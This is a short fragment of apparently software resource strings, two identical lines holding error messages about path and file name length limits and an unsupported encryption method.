=Total path and file name length must not exceed %d characters#Unsupported encryption method in %s
=Total path and file name length must not exceed %d characters#Unsupported encryption method in %s